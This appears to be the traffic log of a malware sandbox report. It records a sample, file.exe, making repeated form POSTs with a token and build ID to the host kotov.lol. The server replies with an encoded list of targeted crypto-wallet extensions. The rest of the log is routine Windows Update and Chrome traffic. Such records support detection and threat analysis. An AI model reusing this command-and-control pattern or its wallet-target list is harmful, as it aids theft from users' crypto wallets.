                                                                                                                    2024-11-30 10:34:16 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------CBFBGCGIJKJJKFIDBFCGCont
                                                                                                                    2024-11-30 10:34:17 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:16 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:17 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.44973795.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:18 UTC317OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 5689
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:18 UTC5689OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------KEHDHIDAEHCFHJJJJECACont
                                                                                                                    2024-11-30 10:34:19 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:19 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.44973895.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:20 UTC316OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 489
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:20 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------KEHDHIDAEHCFHJJJJECACont
                                                                                                                    2024-11-30 10:34:21 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:21 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.4497364.245.163.56443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:20 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yYlL1HFAF3FGtYT&MD=6tCKpNkB HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept: */*
                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                    2024-11-30 10:34:21 UTC560INHTTP/1.1 200 OK
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Expires: -1
                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                    MS-CorrelationId: 539fc7fd-08ae-4b8a-9fb1-0abd878703f3
                                                                                                                    MS-RequestId: 8487109c-b75a-47e8-8a23-96415f6a84f0
                                                                                                                    MS-CV: AD4A6Ri9a0Sde54T.0
                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:20 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 24490
                                                                                                                    2024-11-30 10:34:21 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                    2024-11-30 10:34:21 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.449746142.250.181.1004434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:22 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                    Host: www.google.com
                                                                                                                    Connection: keep-alive
                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                    Sec-Fetch-Site: none
                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    2024-11-30 10:34:23 UTC1266INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:22 GMT
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: -1
                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-0UJriKyUPrh6ND5oFJ7p_A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                    Permissions-Policy: unload=()
                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                    Server: gws
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Accept-Ranges: none
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Connection: close
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    2024-11-30 10:34:23 UTC124INData Raw: 62 37 39 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 68 69 6c 61 64 65 6c 70 68 69 61 20 65 61 67 6c 65 73 20 76 73 20 62 61 6c 74 69 6d 6f 72 65 20 72 61 76 65 6e 73 22 2c 22 64 61 69 6c 79 20 68 6f 72 6f 73 63 6f 70 65 73 20 66 6f 72 20 6e 6f 76 65 6d 62 65 72 20 32 39 20 32 30 32 34 22 2c 22 72 69 70 70 6c 65 20 78 72 70 20 70 72 69 63 65 20 70 72 65 64 69 63 74 69 6f
                                                                                                                    Data Ascii: b79)]}'["",["philadelphia eagles vs baltimore ravens","daily horoscopes for november 29 2024","ripple xrp price predictio
                                                                                                                    2024-11-30 10:34:23 UTC1390INData Raw: 6e 22 2c 22 62 6c 75 65 20 6c 6f 63 6b 20 72 69 76 61 6c 73 20 63 6f 64 65 73 20 72 6f 62 6c 6f 78 22 2c 22 69 67 61 20 c5 9b 77 69 c4 85 74 65 6b 22 2c 22 6d 69 64 6e 69 67 68 74 20 67 6c 69 74 7a 20 71 75 65 6e 63 68 65 72 22 2c 22 73 6f 75 74 68 20 6b 6f 72 65 61 20 63 68 69 6e 61 20 72 75 73 73 69 61 20 6a 65 74 73 22 2c 22 68 79 62 65 20 6e 65 77 6a 65 61 6e 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f
                                                                                                                    Data Ascii: n","blue lock rivals codes roblox","iga witek","midnight glitz quencher","south korea china russia jets","hybe newjeans"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNo
                                                                                                                    2024-11-30 10:34:23 UTC1390INData Raw: 64 35 54 54 64 33 65 6a 4d 78 5a 57 5a 69 55 46 64 74 62 44 4a 50 59 55 35 55 61 48 42 77 56 6b 68 34 51 58 6c 6d 4b 7a 51 78 62 6e 64 54 61 57 35 31 63 55 68 6c 51 55 74 72 52 46 5a 6c 54 57 78 6c 52 44 6c 6c 59 56 63 30 4d 56 63 33 4e 45 74 4a 4d 46 64 4e 52 45 73 33 4d 6c 42 56 4e 44 45 77 4d 6d 56 36 56 47 31 71 62 6c 4a 36 64 58 70 47 55 47 4e 42 53 45 46 49 55 54 67 7a 53 33 42 46 51 54 68 4f 64 6d 52 57 5a 57 5a 69 57 44 46 53 57 45 4d 30 55 6b 64 4e 4d 48 4e 7a 4e 33 64 71 4d 32 31 5a 55 57 73 72 5a 57 4d 30 4e 44 5a 49 63 7a 46 56 61 33 64 69 5a 58 46 6c 4e 56 56 4f 5a 33 4a 74 61 32 6c 44 65 47 49 34 56 47 4e 70 52 48 5a 44 55 6c 4e 45 65 6b 6c 50 64 45 6c 58 4b 32 49 33 56 46 46 56 4d 44 52 50 5a 6b 56 70 56 69 39 56 57 6a 46 75 53 7a 68 59 5a
                                                                                                                    Data Ascii: d5TTd3ejMxZWZiUFdtbDJPYU5UaHBwVkh4QXlmKzQxbndTaW51cUhlQUtrRFZlTWxlRDllYVc0MVc3NEtJMFdNREs3MlBVNDEwMmV6VG1qblJ6dXpGUGNBSEFIUTgzS3BFQThOdmRWZWZiWDFSWEM0UkdNMHNzN3dqM21ZUWsrZWM0NDZIczFVa3diZXFlNVVOZ3Jta2lDeGI4VGNpRHZDUlNEeklPdElXK2I3VFFVMDRPZkVpVi9VWjFuSzhYZ
                                                                                                                    2024-11-30 10:34:23 UTC40INData Raw: 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a
                                                                                                                    Data Ascii: Y","ENTITY","QUERY","QUERY","QUERY"]}]
                                                                                                                    2024-11-30 10:34:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.449743142.250.181.1004434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:22 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                    Host: www.google.com
                                                                                                                    Connection: keep-alive
                                                                                                                    Sec-Fetch-Site: none
                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.449741142.250.181.1004434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:22 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                    Host: www.google.com
                                                                                                                    Connection: keep-alive
                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    2024-11-30 10:34:23 UTC1018INHTTP/1.1 200 OK
                                                                                                                    Version: 700238841
                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                    Permissions-Policy: unload=()
                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:22 GMT
                                                                                                                    Server: gws
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Accept-Ranges: none
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Connection: close
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    2024-11-30 10:34:23 UTC372INData Raw: 31 37 65 66 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                    Data Ascii: 17ef)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                    2024-11-30 10:34:23 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                    Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                    2024-11-30 10:34:23 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                    Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                    2024-11-30 10:34:23 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
